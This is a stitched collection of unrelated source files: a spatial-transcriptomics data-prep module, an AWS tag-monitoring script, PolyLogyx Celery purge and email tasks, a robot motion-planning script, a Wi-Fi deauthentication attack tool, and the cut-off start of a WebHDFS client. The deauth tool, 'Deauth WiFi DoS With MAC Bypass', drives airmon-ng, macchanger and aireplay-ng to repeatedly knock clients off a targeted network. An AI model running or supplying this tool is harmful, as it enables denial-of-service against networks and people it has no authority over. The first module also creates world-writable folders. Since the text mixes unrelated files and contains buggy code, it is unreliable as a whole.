    NOTE: the many prints were used to eyeball the process and are kept.
    '''
    spots_filenames = [filename for filename in listdir(path_to_dir) if filename.endswith(".csv") and "metadata" not in filename]
    images_filenames = [filename for filename in listdir(path_to_dir) if filename.endswith(".jpg")]
    stdata_filenames = [filename for filename in listdir(path_to_dir) if filename.endswith(".tsv")]
    spots_filenames.sort()
    images_filenames.sort()
    stdata_filenames.sort()
    print(spots_filenames)
    print('****')
    print(images_filenames)
    print('****')
    print(stdata_filenames)
    print('****')
    # extract the bare sample name from each filename flavour; the [2:] slice
    # drops a 2-character prefix that precedes the sample name in each scheme
    sample_names_from_spots_filenames = [(name.partition('spots_')[2].partition('.')[0])[2:] for name in spots_filenames]
    print(sample_names_from_spots_filenames)
    print('****')
    sample_names_from_images_filenames = [(name.partition('HE_')[2].partition('.')[0])[2:] for name in images_filenames]
    print(sample_names_from_images_filenames)
    print('****')
    sample_names_from_stdata_filenames = [(name.partition('_stdata')[0])[2:] for name in stdata_filenames]
    print(sample_names_from_stdata_filenames)
    print('****')
    print(f'lengths: {len(sample_names_from_spots_filenames)}, {len(sample_names_from_images_filenames)}, {len(sample_names_from_stdata_filenames)}')
    # samples that have all three files present
    intersection = [name for name in sample_names_from_images_filenames if name in sample_names_from_spots_filenames and name in sample_names_from_stdata_filenames]
    print(f'intersection length {len(intersection)} intersection:\n{intersection}')
    print('****')
    new_folder_names = sample_names_from_images_filenames
    for name in new_folder_names:
        dir_name = os.path.join(path_to_dir, name)
        if not os.path.exists(dir_name):
            # temporarily clear the umask so the folder is created world-writable
            try:
                original_umask = os.umask(0)
                os.makedirs(dir_name, mode=0o777)
            finally:
                os.umask(original_umask)
        # first filename of each flavour that contains the sample name
        image_filename = [s for s in images_filenames if name in s][0]
        spots_filename = [s for s in spots_filenames if name in s][0]
        stdata_filename = [s for s in stdata_filenames if name in s][0]
        # BUGFIX: the original concatenated `path_to_dir + filename` (and
        # `dir_name + "/..."`), which silently breaks unless the caller passes
        # a trailing separator; os.path.join is separator-safe either way.
        shutil.copy2(src=os.path.join(path_to_dir, image_filename), dst=os.path.join(dir_name, "original_image.jpg"))
        shutil.copy2(src=os.path.join(path_to_dir, spots_filename), dst=os.path.join(dir_name, "spots.csv"))
        shutil.copy2(src=os.path.join(path_to_dir, stdata_filename), dst=os.path.join(dir_name, "stdata.tsv"))
def create_image_subfolders_in_new_mandalay_data_folders(path_to_dir):
    '''
    For every biopsy subfolder under `path_to_dir`, trigger the cutting of its
    large biopsy image into small per-spot images (which also creates the
    "/images" subfolder inside each biopsy folder).

    :param path_to_dir: folder whose immediate subfolders are the per-biopsy
        folders produced by `create_folders_from_new_mandalay_data`.
    '''
    print(f'\n\nentered: create_image_subfolders_in_new_mandalay_data_folders')
    # os.walk yields (root, subdirs, files); the first tuple's subdir list is
    # the set of immediate biopsy folders
    subdir_list = [subdir for root, subdir, files in os.walk(path_to_dir, topdown=True)][0]
    print(subdir_list)
    for subdir in subdir_list:
        print(subdir)
        # BUGFIX: the original did `path_to_dir + subdir` and documented the
        # assumption that a "/" sits between the two strings; os.path.join
        # works whether or not the caller supplied a trailing separator.
        create_smaller_images_from_large_image_in_mandalay_data(path_to_dir=os.path.join(path_to_dir, subdir))
def create_smaller_images_from_large_image_in_mandalay_data(path_to_dir):
    '''
    Cut the large biopsy image of one mandalay sample into small per-spot
    images using the sample's spots file.

    :param path_to_dir: biopsy folder containing "spots.csv" (per-spot x,y
        pixel coordinates) and "original_image.jpg". The cut images are
        written into an "images" subfolder (created if missing).
    '''
    print("\n----- entered function create_smaller_images_from_large_image_in_mandalay_data -----")
    print(f' given path: {path_to_dir}')
    # data points (x,y coordinates) for the tissue spots
    # BUGFIX (throughout): paths were built with `path_to_dir + "/..."` and
    # `out_path + filename` string concatenation; os.path.join is used instead
    # so trailing-separator differences in `path_to_dir` cannot break paths.
    positions_dataframe = pd.read_csv(os.path.join(path_to_dir, "spots.csv"))
    positions_dataframe.columns = ['index', 'x', 'y']
    # the large biopsy image; cv2 loads it as BGR
    img = cv2.imread(os.path.join(path_to_dir, "original_image.jpg"))
    print(f'img.type {type(img)} ')
    print(f'img.shape {img.shape} ')
    # create the output folder if it doesn't exist
    # (the redundant function-local `import os` was removed; os is imported at
    # module level and already used by the sibling functions)
    out_path = os.path.join(path_to_dir, "images")
    if not os.path.exists(out_path):
        os.makedirs(out_path)
    ## TODO - get from "scalefactors_json" file. (leon's note)
    # NOTE: with spot_diameter_fullres = 177.482... the output images are 176x176
    spot_diameter_fullres = 177.4829519178534
    spot_radius = int(spot_diameter_fullres / 2)
    total_amount_of_spots = len(positions_dataframe.index)
    for idx, row in positions_dataframe.iterrows():
        barcode = row['index']
        x = round(row['x'])
        y = round(row['y'])
        square_file_name = "{}_x{}_y{}_square.png".format(barcode, x, y)
        # progress line is overwritten in place via the carriage return
        print(f'processing image {idx + 1} of {total_amount_of_spots} with name: {square_file_name}', end='\r')
        # crop a square of side 2*spot_radius centred on the spot
        # NOTE(review): no bounds clamping -- spots near the image edge yield a
        # smaller (possibly empty) crop, same as the original code.
        roi_square = img[y - spot_radius:y + spot_radius, x - spot_radius:x + spot_radius]
        cv2.imwrite(os.path.join(out_path, square_file_name), roi_square)
    print(f'\nfinished cutting the big image')
    # BUGFIX: the closing log line previously named a non-existent function
    # ("create_smaller_images_from_biopsy_sample")
    print("\n----- finished function create_smaller_images_from_large_image_in_mandalay_data -----")
def create_stdata_file_from_mtx(path_to_10x_genomics_data_dir: str = None):
    '''
    Reformat 10x-genomics-style expression data (features.tsv, barcodes.tsv,
    matrix.mtx) into a single mandalay-style "stdata.tsv" file.

    :param path_to_10x_genomics_data_dir: folder that contains "patient1" and
        "patient2" subfolders, each holding the 3 input files. When None, the
        original author's hard-coded Windows download paths are used.

    The resulting stdata.tsv is written next to the input files (one per
    patient subfolder); afterwards the 3 original files are no longer needed.
    '''
    if path_to_10x_genomics_data_dir is None:
        path_patient1_files = "C:/Users/royru/Downloads/new data STDL project from mandalay/patient1"
        path_patient2_files = "C:/Users/royru/Downloads/new data STDL project from mandalay/patient2"
    else:
        # BUGFIX: the original referenced an undefined name
        # `path_to_10x_genomics_data` here, raising NameError whenever a
        # path was actually passed in.
        path_patient1_files = path_to_10x_genomics_data_dir + "/patient1"
        path_patient2_files = path_to_10x_genomics_data_dir + "/patient2"
    for path_to_mtx_tsv_files_dir in [path_patient1_files, path_patient2_files]:
        print("started reading features.tsv")
        path_to_features = path_to_mtx_tsv_files_dir + "/features.tsv"
        features_dataframe = pd.read_csv(path_to_features, sep='\t', header=None)
        features_dataframe.columns = ['feature_ids', 'gene_names', 'feature_types']  # giving columns their names
        print("V finished reading features.tsv")
        print("started reading barcodes.tsv")
        path_to_barcodes = path_to_mtx_tsv_files_dir + "/barcodes.tsv"
        barcodes_dataframe = pd.read_csv(path_to_barcodes, sep='\t', header=None)
        barcodes_dataframe.columns = ['barcodes']  # giving columns their names
        print("V finished reading barcodes.tsv")
        print("started reading matrix.mtx. this might take some time ...")
        path_to_matrix = path_to_mtx_tsv_files_dir + "/matrix.mtx"
        matrix = scipy.io.mmread(path_to_matrix)
        # keep the matrix sparse inside pandas to avoid densifying huge data
        # (see https://pandas.pydata.org/docs/user_guide/sparse.html)
        matrix_dataframe = pd.DataFrame.sparse.from_spmatrix(matrix)
        print("V finished reading matrix.mtx")
        # 10x genomics layout: rows are features (genes), columns are barcodes
        matrix_dataframe.index = features_dataframe.iloc[:, 0].to_list()
        matrix_dataframe.columns = barcodes_dataframe.iloc[:, 0].to_list()
        # transpose so the result matches the mandalay stdata layout
        # (rows = barcodes/spots, columns = features)
        matrix_dataframe = matrix_dataframe.transpose()
        # finally, save the new tab-separated stdata file
        matrix_dataframe.to_csv(path_to_mtx_tsv_files_dir + "/stdata.tsv", sep='\t')
|
<reponame>propyless/openshift-tools<filename>scripts/monitoring/ops-ec2-check-tags.py
#!/usr/bin/env python
# vim: expandtab:tabstop=4:shiftwidth=4
"""
This is a script that gathers tags from instances and reports the status of the tags to zabbix
Usage:
ops-ec2-check-tags.py --aws-creds-profile profile1 --clusterid=testcluster --region=us-east-1
"""
# Ignoring module name
# pylint: disable=invalid-name
import os
import argparse
import requests
# Reason: disable pylint import-error because our libs aren't loaded on jenkins.
# Status: temporary until we start testing in a container where our stuff is installed.
# pylint: disable=import-error
from openshift_tools.monitoring.metric_sender import MetricSender
# uncomment this for realsie
from openshift_tools.cloud.aws.instance_util import InstanceUtil
CONFIG_LOOP_TAG_KEY = 'config_loop.enabled'
class AWSTagsMonitorCLI(object):
    """ Responsible for parsing cli args and running the snapshotter. """
    # NOTE: this script is Python 2 (print statements, dict.itervalues);
    # keep it that way unless the whole file is ported at once.
    def __init__(self):
        """ initialize the class """
        self.args = None
        self.parse_args()
    @staticmethod
    def get_current_az():
        """ Returns the Availability Zone that the instance is in. """
        # EC2 instance metadata service (only reachable from inside EC2)
        availability_zone = requests.get('http://169.254.169.254/latest/meta-data/placement/availability-zone').text
        return availability_zone
    @staticmethod
    def get_current_region():
        """ Returns the region that the instance is in. """
        # region = AZ minus its trailing zone letter (e.g. us-east-1a -> us-east-1)
        availability_zone = AWSTagsMonitorCLI.get_current_az()
        region = availability_zone[0:-1]
        return region
    def parse_args(self):
        """ parse the args from the cli """
        parser = argparse.ArgumentParser(description='AWS Tag Checker')
        parser.add_argument('--aws-creds-profile', required=False,
                            help='The AWS credentials profile to use.')
        parser.add_argument('--clusterid', required=False,
                            help='The clusterid of items to check')
        parser.add_argument('--dry-run', action='store_true', default=False,
                            help='Say what would have been done, but don\'t actually do it.')
        # NOTE(review): help text below looks copy-pasted from --clusterid;
        # it presumably should describe the AWS region -- confirm before fixing.
        parser.add_argument('--region', required=False,
                            help='The clusterid of items to check')
        self.args = parser.parse_args()
    def main(self):
        """ main function """
        # default the region to wherever this instance is running
        if not self.args.region:
            self.args.region = AWSTagsMonitorCLI.get_current_region()
        if self.args.aws_creds_profile:
            os.environ['AWS_PROFILE'] = self.args.aws_creds_profile
        instance_util = InstanceUtil(self.args.region, True)
        # restrict to one cluster when --clusterid was given
        if self.args.clusterid:
            instances = instance_util.get_all_instances_as_dict(filters={"tag:clusterid" : self.args.clusterid})
        else:
            instances = instance_util.get_all_instances_as_dict()
        tags = []
        # This will print out a list of instances
        # and the tags associated with them
        for v in instances.itervalues():
            print v.id + ":"
            for name, value in v.tags.iteritems():
                print " %s: %s" %(name, value)
            print
            tags.append(v.tags)
        print "Sending results to Zabbix:"
        if self.args.dry_run:
            print " *** DRY RUN, NO ACTION TAKEN ***"
        else:
            AWSTagsMonitorCLI.report_tags_to_zabbix(tags)
    @staticmethod
    def report_tags_to_zabbix(tags):
        """ Sends the commands exit code to zabbix. """
        mts = MetricSender(verbose=True)
        #######################################################
        # This reports the "config" tag from each instance
        # If config ~= "true", report 0
        # If config ~= "false", report 1
        # If config not found, report 2
        #######################################################
        for tag in tags:
            if 'config' in tag.keys():
                if tag['config'].lower() == "true":
                    config_value = 0
                else:
                    config_value = 1
            else:
                config_value = 2
            # report per-host under config_loop.enabled; assumes every
            # instance carries a 'Name' tag -- TODO confirm
            mts.add_metric({CONFIG_LOOP_TAG_KEY : config_value}, host=tag['Name'])
        ####################################
        # End of config tag checking
        ####################################
        # Actually send them
        mts.send_metrics()
# Script entry point: the constructor parses CLI args, main() runs the check.
if __name__ == "__main__":
    AWSTagsMonitorCLI().main()
|
# -*- coding: utf-8 -*-
import base64
import datetime as dt
import sqlalchemy
from celery import Celery
from flask import current_app, json
from kombu import Exchange, Queue
from polylogyx.models import Settings, AlertEmail, Node, ResultLog, StatusLog, db, Alerts, CarveSession, DistributedQueryTask
from polylogyx.constants import PolyLogyxServerDefaults
# Celery application wired to a single dedicated queue ('worker3') on a
# direct exchange; all tasks default to that queue/exchange/routing key.
celery = Celery(__name__)
default_exchange = Exchange('default', type='direct')
celery.conf.task_queues = (
    Queue('worker3', default_exchange, routing_key='default'),
)
celery.conf.task_default_queue = 'worker3'
celery.conf.task_default_exchange = 'default'
celery.conf.task_default_routing_key = 'default'
# Both periodic (beat) tasks run once a day (86400 seconds).
celery.conf.beat_schedule = {
    "send-alert-emails": {
        "task": "polylogyx.tasks.send_alert_emails",
        "schedule": 86400.0
    }, "purge_old_data": {
        "task": "polylogyx.tasks.purge_old_data",
        "schedule": 86400.0
    }
}
def update_sender_email(db):
    '''
    Load the SMTP/email settings stored in the Settings table into the Flask
    application config.

    :param db: SQLAlchemy handle (its session is used for the settings query).
    :returns: True when all required settings were found and applied,
              False when the settings row is missing or incomplete.
    '''
    emailSenderObj = db.session.query(Settings).filter(Settings.name == PolyLogyxServerDefaults.plgx_config_all_settings).first()
    if not emailSenderObj:
        current_app.logger.info("Email credentials are not set..")
        return False
    try:
        settings = json.loads(emailSenderObj.setting)
        emailSender = settings['email']
        # NOTE: base64.decodestring was removed in Python 3.9; decodebytes is
        # the exact same function under its modern name.
        emailPassword = base64.decodebytes(settings['password'].encode('utf-8')).decode('utf-8')
        smtpPort = settings['smtpPort']
        smtpAddress = settings['smtpAddress']
        emailRecipients = settings['emailRecipients']
        emailRecipientList = []
        if emailRecipients and len(emailRecipients) > 0:
            for emailRecipient in emailRecipients:
                emailRecipientList.append(emailRecipient)
        current_app.config['EMAIL_RECIPIENTS'] = emailRecipientList
        current_app.config['MAIL_USERNAME'] = emailSender
        # BUGFIX: the original line assigned the bare placeholder <PASSWORD>
        # (a syntax error left by credential scrubbing); the decoded password
        # was clearly meant to be stored here.
        current_app.config['MAIL_PASSWORD'] = emailPassword
        current_app.config['MAIL_SERVER'] = smtpAddress
        current_app.config['MAIL_PORT'] = int(smtpPort)
        return True
    except Exception as e:
        # any missing key / bad value lands here
        current_app.logger.info("Incomplete email credentials")
        current_app.logger.error(e)
        return False
@celery.task()
def send_alert_emails():
    '''
    Daily beat task: for every node, send any alert emails that have not yet
    been dispatched. Skips delivery entirely when the SMTP settings are
    missing or invalid.
    '''
    from polylogyx.models import db
    current_app.logger.info("Task is started to send the pending emails of the alerts reported")
    email_credentials_valid = update_sender_email(db)
    if email_credentials_valid:
        nodes = Node.query.all()
        for node in nodes:
            try:
                send_pending_node_emails(node, db)
                current_app.logger.info("Pending emails of the alerts reported are sent")
            except Exception as e:
                # BUGFIX: Exception.message does not exist on Python 3; use
                # str(e), consistent with the other handlers in this module.
                current_app.logger.error(str(e))
    current_app.logger.info("Task is completed in sending the pending emails of the alerts reported")
@celery.task()
def purge_old_data():
    '''
    Daily beat task that purges old data:
      * permanently removes soft-DELETED hosts that have no remaining logs;
      * when the 'purge_data_duration' setting (in days) is positive, deletes
        ResultLog / StatusLog / Alerts rows older than that duration and
        queues permanent deletion of hosts deleted before it.
    '''
    from polylogyx.models import db  # consistent with the rest of this module
    import time
    current_app.logger.info("Task to purge older data is started")
    try:
        # hosts already marked DELETED with no logs left can go immediately
        deleted_hosts = Node.query.filter(Node.state == Node.DELETED).all()
        node_ids_to_delete = [node.id for node in deleted_hosts if not node.result_logs.count() and not node.status_logs.count()]
        if node_ids_to_delete:
            permanent_host_deletion.apply_async(queue='default_queue_ui_tasks', args=[node_ids_to_delete])
        delete_setting = db.session.query(Settings).filter(Settings.name == 'purge_data_duration').first()
        max_delete_count = 1000
        actual_delete_count = 1000
        if delete_setting and int(delete_setting.setting) > 0:
            # BUGFIX: the duration log used to run BEFORE the None-check,
            # so a missing setting raised AttributeError and aborted the
            # whole purge via the outer except.
            current_app.logger.info("Purging the data for the duration {}".format(int(delete_setting.setting)))
            since = dt.datetime.now() - dt.timedelta(hours=24 * int(delete_setting.setting))
            # delete ResultLog rows in batches of 1000 until a short batch
            while actual_delete_count == 1000:
                try:
                    actual_delete_count = int(ResultLog.query.filter(ResultLog.id.in_(db.session.query(ResultLog.id).filter(ResultLog.timestamp < since).limit(max_delete_count))).delete(synchronize_session='fetch'))
                    db.session.commit()
                    current_app.logger.info("Purged {0} records".format(actual_delete_count))
                    time.sleep(2)  # give the DB breathing room between batches
                except Exception as e:
                    db.session.commit()
                    current_app.logger.error("Error in Purge : {0}".format(e))
            current_app.logger.info("Purging the Status Logs beyond the purge duration")
            StatusLog.query.filter(StatusLog.created < since).delete()
            db.session.commit()
            current_app.logger.info("Purging the Alerts beyond the purge duration")
            Alerts.query.filter(Alerts.created_at < since).delete()
            db.session.commit()
            # hosts soft-deleted before the cut-off are removed for good
            hosts = db.session.query(Node.host_identifier, Node.id).filter(Node.state == Node.DELETED).filter(Node.updated_at < since).all()
            node_ids = [item[1] for item in hosts]
            permanent_host_deletion.apply_async(queue='default_queue_ui_tasks', args=[node_ids])
        else:
            current_app.logger.info("Deleting limit not set, skipping ")
    except Exception as e:
        current_app.logger.error(e)
    current_app.logger.info("Task to purge older data is completed")
@celery.task()
def permanent_host_deletion(node_ids):
    # Permanently removes the given (already soft-DELETED) hosts.
    # NOTE(review): the trailing commit after the if/else looks intentional
    # (flushes any leftover session state) -- confirm before restructuring.
    if node_ids:
        current_app.logger.info("Hosts with ids {} are requested to delete permanently".format(node_ids))
        try:
            # detach tags first so association rows don't block the delete
            nodes = db.session.query(Node).filter(Node.id.in_(node_ids)).all()
            for node in nodes:
                node.tags = []
            db.session.commit()
            # only rows still in DELETED state are removed
            deleted_count = Node.query.filter(Node.state == Node.DELETED).filter(Node.id.in_(node_ids)).delete(synchronize_session=False)
            current_app.logger.info("{} hosts are deleted permanently".format(deleted_count))
        except Exception as e:
            current_app.logger.error("Unable to delete tags/result_log/status_log/alert_email/alerts from the node! " + str(e))
    else:
        current_app.logger.info("No host is requested to delete")
    db.session.commit()
def format_records(results):
    '''
    Convert a raw DB result proxy into a list of row dictionaries.

    :param results: object exposing keys() (column names) and fetchall() (rows).
    :returns: one dict per row, mapping column name -> cell value.
    '''
    column_names = list(results.keys())
    return [dict(zip(column_names, row)) for row in results.fetchall()]
class DecimalEncoder(json.JSONEncoder):
    '''JSON encoder that serialises decimal.Decimal values as floats.'''
    def default(self, o):
        import decimal
        if not isinstance(o, decimal.Decimal):
            # defer to the base encoder (which raises TypeError for unknowns)
            return super(DecimalEncoder, self).default(o)
        return float(o)
def send_pending_node_emails(node, db):
    '''
    Concatenate all unsent alert-email bodies for `node` into one message,
    mark those rows PENDING, and hand the message to send_email (which marks
    them COMPLETED on success).
    '''
    alert_emails = AlertEmail.query.filter(AlertEmail.node == node).filter(AlertEmail.status == None).all()
    body = ''
    for alert_email in alert_emails:
        body = body + alert_email.body
    if body:
        try:
            db.session.query(AlertEmail).filter(AlertEmail.status == None).filter(AlertEmail.node == node).update(
                {'status': 'PENDING'})
            db.session.commit()
            send_email(node, body, db)
        except Exception as e:
            # BUGFIX: Exception.message does not exist on Python 3; use
            # str(e), consistent with the other handlers in this module.
            current_app.logger.error(str(e))
def send_email(node, body, db):
    '''
    Send `body` to the node's alert recipients, then mark that node's PENDING
    alert emails as COMPLETED.
    '''
    # local import: polylogyx.utils.send_email deliberately shadows this
    # function's name inside the body (and avoids an import cycle)
    from polylogyx.utils import send_email
    send_email(body=body, subject=node.display_name + ' Alerts Today',
               config=current_app.config, node=node, db=db)
    try:
        db.session.query(AlertEmail).filter(AlertEmail.status == 'PENDING').filter(AlertEmail.node == node).update(
            {'status': 'COMPLETED'})
        db.session.commit()
    except Exception as e:
        # BUGFIX: Exception.message does not exist on Python 3; use str(e),
        # consistent with the other handlers in this module.
        current_app.logger.error(str(e))
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 6 15:27:04 2016
@author: alex
"""
from AlexRobotics.planning import RandomTree as RPRT
from AlexRobotics.dynamic import Hybrid_Manipulator as HM
from AlexRobotics.control import RminComputedTorque as RminCTC
import numpy as np
import matplotlib.pyplot as plt
# --- model set-up: hybrid three-link manipulator with symmetric joint limits ---
R = HM.HybridThreeLinkManipulator()
R.x_ub[0] = np.pi
R.x_ub[1] = np.pi
R.x_ub[2] = np.pi
R.x_lb[0] = - np.pi
R.x_lb[1] = - np.pi
R.x_lb[2] = - np.pi
R.ubar = np.array([0,0,0,0])
# start and goal states (presumably [q1,q2,q3, dq1,dq2,dq3] -- TODO confirm)
x_start = np.array([0,0,1.5,0,0,0])
x_goal = np.array([-3,0,-1.5,0,0,0])
RRT = RPRT.RRT( R , x_start )
# discrete control set: torque level +/-T (or 0) on each of the 3 actuated
# inputs, crossed with the two discrete modes u_R1/u_R2 in the 4th input slot
T = 8
u_R1 = 0
u_R2 = 1
RRT.U = np.array([[ 0,T,0,u_R1],[ 0,0,0,u_R1],[ 0,-T,0,u_R1],[ 0,0,T,u_R1],[ 0,0,-T,u_R1],[ 0,T,T,u_R1],[ 0,-T,-T,u_R1],[ 0,-T,T,u_R1],[ 0,T,-T,u_R1],
                  [ T,T,0,u_R1],[ T,0,0,u_R1],[ T,-T,0,u_R1],[ T,0,T,u_R1],[ T,0,-T,u_R1],[ T,T,T,u_R1],[ T,-T,-T,u_R1],[ T,-T,T,u_R1],[ T,T,-T,u_R1],
                  [-T,T,0,u_R1],[-T,0,0,u_R1],[-T,-T,0,u_R1],[-T,0,T,u_R1],[-T,0,-T,u_R1],[-T,T,T,u_R1],[-T,-T,-T,u_R1],[-T,-T,T,u_R1],[-T,T,-T,u_R1],
                  [ 0,T,0,u_R2],[ 0,0,0,u_R2],[ 0,-T,0,u_R2],[ 0,0,T,u_R2],[ 0,0,-T,u_R2],[ 0,T,T,u_R2],[ 0,-T,-T,u_R2],[ 0,-T,T,u_R2],[ 0,T,-T,u_R2],
                  [ T,T,0,u_R2],[ T,0,0,u_R2],[ T,-T,0,u_R2],[ T,0,T,u_R2],[ T,0,-T,u_R2],[ T,T,T,u_R2],[ T,-T,-T,u_R2],[ T,-T,T,u_R2],[ T,T,-T,u_R2],
                  [-T,T,0,u_R2],[-T,0,0,u_R2],[-T,-T,0,u_R2],[-T,0,T,u_R2],[-T,0,-T,u_R2],[-T,T,T,u_R2],[-T,-T,-T,u_R2],[-T,-T,T,u_R2],[-T,T,-T,u_R2]],)
# RRT search parameters
RRT.dt = 0.2
RRT.goal_radius = 1.0
RRT.alpha = 0.9
RRT.max_nodes = 50000
RRT.max_solution_time = 10
# Dynamic plot
RRT.dyna_plot = True
RRT.dyna_node_no_update = 1000
RRT.find_path_to_goal( x_goal )
#RRT.animate3D_solution( 0.5 )
# Assign controller: track the RRT solution with the R-min computed-torque law
CTC_controller = RminCTC.RminComputedTorqueController( R )
CTC_controller.load_trajectory( RRT.solution )
CTC_controller.goal = x_goal
R.ctl = CTC_controller.ctl
# controller tuning (natural frequency / damping) and trajectory options
CTC_controller.w0 = 1.0
CTC_controller.zeta = 0.7
CTC_controller.traj_ref_pts = 'closest'
CTC_controller.n_gears = 2
""" Simulation and plotting """
# Sim: run 5 s past the planned time-to-goal at a 10 ms step
tf = RRT.time_to_goal + 5
n = int( np.round( tf / 0.01 ) ) + 1
R.computeSim( x_start , tf , n , solver = 'euler' )
# Plot closed-loop states and inputs, the search tree, and a 3D animation
R.Sim.plot_CL('x')
R.Sim.plot_CL('u')
RRT.plot_2D_Tree()
R.animate3DSim()
# Hold figures alive
plt.show()
<gh_stars>1-10
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Developed in Python3
# RUN WITH ROOT USER!!!
# Install NETIFACES: 'pip3 install netifaces'
"""
+-------------------------------------------------------+
| Create BY: <NAME> |
| |
| [*] AUTOR: <NAME> |
| [*] GITHUB: https://github.com/JulianPedro |
+-------------------------------------------------------+
"""
import os
import time
import subprocess
import netifaces
CYAN = '\033[96m'
BLUE = '\033[94m'
GREEN = '\033[92m'
RED = '\033[91m'
BOLD = '\033[1m'
END = '\033[0m'
RESET='\033[1;00m'
def attack(monitor):
os.system('airodump-ng {0} --manufacturer'.format(monitor))
bssid = input(GREEN+BOLD+'DWD (attack) > Set BSSID: '+END)
essid = input(GREEN+BOLD+'DWD (attack) > Set ESSID: '+END)
channel = input(GREEN+BOLD+'DWD (attack) > Set CHANNEL: '+END)
frames = input(RED+BOLD+'DWD (attack) > Set Number Of Frames Before Mac Reset [Ex: 1000]: '+END)
start = input(GREEN+BOLD+'DWD (attack) > Start Attack [Y/N]: ')
if (start.upper() == 'Y'):
print(GREEN+BOLD+'DWD (attack) > Starting Attack in 3s! '+END)
time.sleep(3)
print(GREEN+BOLD+'DWD (attack) > Settling Channel {0}'+END).format(channel)
os.system('airodump-ng --bssid '+bssid+' --channel '+channel+' '+monitor+' 2> /dev/null &')
while True:
print(GREEN+BOLD+'DWD (attack) > Changing address MAC'+END)
os.system('ifconfig '+monitor+' down')
m = os.system('macchanger -r '+monitor+' 1> /dev/null 2> /dev/null')
os.system('ifconfig '+monitor+' up')
if m == 256:
next = input(RED+BOLD+'DWD (attack) > Error in changing adress MAC! Continue [Y/N]: '+END)
if (not(next.upper() == 'Y')):
exit()
print(RED+BOLD+'DWD (attack) > Sending '+frames+' Deauth Frames in Channel '+channel+''+END)
if (not essid):
os.system('aireplay-ng -0 '+frames+' -a '+bssid+' --ignore-negative-one '+monitor+' > /dev/null')
else:
os.system('aireplay-ng -0 '+frames+' -a '+bssid+' -e '+essid+' --ignore-negative-one '+monitor+' > /dev/null')
time.sleep(1)
else:
exit()
def mount_mode():
card = input(GREEN+BOLD+'DWD (mount_monitor_mode) > Input WiFi Card Name: '+END)
os.system('airmon-ng check kill > /dev/null')
start_monitor = 'airmon-ng start {0} > /dev/null'.format(card)
os.system(start_monitor)
faces = netifaces.interfaces()
for i in faces:
f = len(i)
f -= 3
if (i[f:] == 'mon' or i[:3] == 'mon'):
monitor = str(i)
print(RED+BOLD+'DWD (mount_monitor_mode) > Monitor Mode Enable [{0}]'+END).format(monitor)
print(GREEN+BOLD+'DWD (mount_monitor_mode) > Redirecting Run Attack'+END)
print(RED+BOLD+'DWD (attack) > Press Ctrl+C To Select The Network'+END)
time.sleep(5)
attack(monitor)
return monitor
def set_mode():
monset = input(GREEN+BOLD+'DWD (set_monitor_mode) > Input Monitor Mode Name: '+END)
print(GREEN+BOLD+'DWD (mount_monitor_mode) > Redirecting Run Attack'+END)
print(RED+BOLD+'DWD (attack) > Press Ctrl+C To Select The Network'+END)
monitor = monset
time.sleep(5)
attack(monitor)
return monitor
banner = '''\033[96m \033[1m
██╗ ██╗ ██╗███████╗██╗ ██╗ ██╗██╗██╗ ██╗
██║ ██║ ██║██╔════╝██║ ██║ ██╔╝██║██║ ██║
██║ █╗ ██║ ██║█████╗ ██║ █████╔╝ ██║██║ ██║
██║███╗██║ ██║██╔══╝ ██║ ██╔═██╗ ██║██║ ██║
╚███╔███╔╝ ██║██║ ██║ ██║ ██╗██║███████╗███████╗
╚══╝╚══╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚══════╝╚══════╝\033[0m '''
os.system('clear')
print(banner)
time.sleep(1.5)
print('''\033[92m\033[1m
Deauth WiFi DoS With MAC Bypass - WiFi Kill - By: <NAME>
[1] - Mount Monitor Mode
[2] - Set Monitor Mode
[0] - Exit
\033[0m''')
option = int(input(GREEN+BOLD+'DWD (option) > '+END))
if option == 1:
mount_mode()
elif option == 2:
set_mode()
elif option == 0:
print(RED+BOLD+'Bye..\n'+END)
exit()
else:
print(RED+BOLD+'Value Incorret!\n'+END)
exit() |
<filename>pywebhdfs/webhdfs.py
from six.moves import http_client
import requests
try:
from urllib.parse import quote, quote_plus
except ImportError:
from urllib import quote, quote_plus
from pywebhdfs import errors, operations
class PyWebHdfsClient(object):
"""
PyWebHdfsClient is a Python wrapper for the Hadoop WebHDFS REST API
To use this client:
>>> from pywebhdfs.webhdfs import PyWebHdfsClient
"""
def __init__(self, host='localhost', port='50070', user_name=None):
"""
Create a new client for interacting with WebHDFS
:param host: the ip address or hostname of the HDFS namenode
:param port: the port number for WebHDFS on the namenode
:param user_name: WebHDFS user.name used for authentication
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
"""
self.host = host
self.port = port
self.user_name = user_name
# create base uri to be used in request operations
self.base_uri = 'http://{host}:{port}/webhdfs/v1/'.format(
host=self.host, port=self.port)
def create_file(self, path, file_data, **kwargs):
"""
Creates a new file on HDFS
:param path: the HDFS file path without a leading '/'
:param file_data: the initial data to write to the new file
The function wraps the WebHDFS REST call:
PUT http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=CREATE
[&overwrite=<true|false>][&blocksize=<LONG>][&replication=<SHORT>]
[&permission=<OCTAL>][&buffersize=<INT>]
The function accepts all WebHDFS optional arguments shown above
Example:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_data = '01010101010101010101010101010101'
>>> my_file = 'user/hdfs/data/myfile.txt'
>>> hdfs.create_file(my_file, my_data)
Example with optional args:
>>> hdfs.create_file(my_file, my_data, overwrite=True, blocksize=64)
Or for sending data from file like objects:
>>> with open('file.data') as file_data:
>>> hdfs.create_file(hdfs_path, data=file_data)
Note: The create_file function does not follow automatic redirects but
instead uses a two step call to the API as required in the
WebHDFS documentation
"""
# make the initial CREATE call to the HDFS namenode
optional_args = kwargs
uri = self._create_uri(path, operations.CREATE, **optional_args)
init_response = requests.put(uri, allow_redirects=False)
if not init_response.status_code == http_client.TEMPORARY_REDIRECT:
_raise_pywebhdfs_exception(
init_response.status_code, init_response.content)
# Get the address provided in the location header of the
# initial response from the namenode and make the CREATE request
# to the datanode
uri = init_response.headers['location']
response = requests.put(
uri, data=file_data,
headers={'content-type': 'application/octet-stream'})
if not response.status_code == http_client.CREATED:
_raise_pywebhdfs_exception(response.status_code, response.content)
return True
def append_file(self, path, file_data, **kwargs):
"""
Appends to an existing file on HDFS
:param path: the HDFS file path without a leading '/'
:param file_data: data to append to existing file
The function wraps the WebHDFS REST call:
